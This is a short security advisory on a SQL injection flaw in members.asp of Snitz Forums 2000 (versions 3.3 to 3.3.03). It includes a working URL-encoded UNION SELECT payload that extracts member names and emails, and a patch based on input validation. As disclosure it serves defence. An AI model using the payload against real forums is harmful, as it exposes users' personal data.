|
COMMAND Snitz Forums 2000 remote SQL query manipulation vulnerability SYSTEMS AFFECTED Snitz Forums 2000 version : 3.3,3.3.01,3.3.02,3.3.03 PROBLEM acemi posted : In members.asp page, when listing the members with a criteria, the input (M_NAME) is not checked for malicious code. As a result, an attacker can add extra SELECT statement to the query with UNION and he/she can view any data in the forum\'s database. Proof-of-concept ---------------- Normally, to view the members\' list whose membername start with \'A\', members.asp page is used as the following: /members.asp? mode=search&M_NAME=A&initial=1&method= Use this link to view the vulnerability: /members.asp?mode=search&M_NAME=XXXX% 25\')%20UNION%20SELECT%20MEMBER_ID,% 20M_STATUS,%20M_NAME%20%2B%20\'/\'%20% 2B%20M_EMAIL%20%2B%20\'/\',%20M_LEVEL,% 20M_EMAIL,%20M_COUNTRY,% 20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,% 20M_AIM,%20M_TITLE,%20M_POSTS,% 20M_LASTPOSTDATE,%20M_LASTHEREDATE,% 20M_DATE,%20M_STATE%20FROM% 20FORUM_MEMBERS%20WHERE%20(M_NAME% 20LIKE%20\'&initial=1&method= MEMBERNAME column will be MEMBERNAME/EMAIL/ column. SOLUTION To fix this bug, in members.asp , change the following lines : SearchName = Request(\"M_NAME\") if SearchName = \"\" then SearchName = Request.Form(\"M_NAME\") end if with : if IsValidString(Request(\"M_NAME\")) then SearchName = Request(\"M_NAME\") end if if SearchName = \"\" then if IsValidString(Request.Form(\"M_NAME\")) then SearchName = Request.Form(\"M_NAME\") end if end if and in function IsValidString(sValidate) in inc_functions.asp , change the following line: sInvalidChars = \"!#$%^&*()=+{}[]|\\;:/?>,<\" with : sInvalidChars = \"!#$%^&*()=+{}[]|\\;:/?>,<\'\"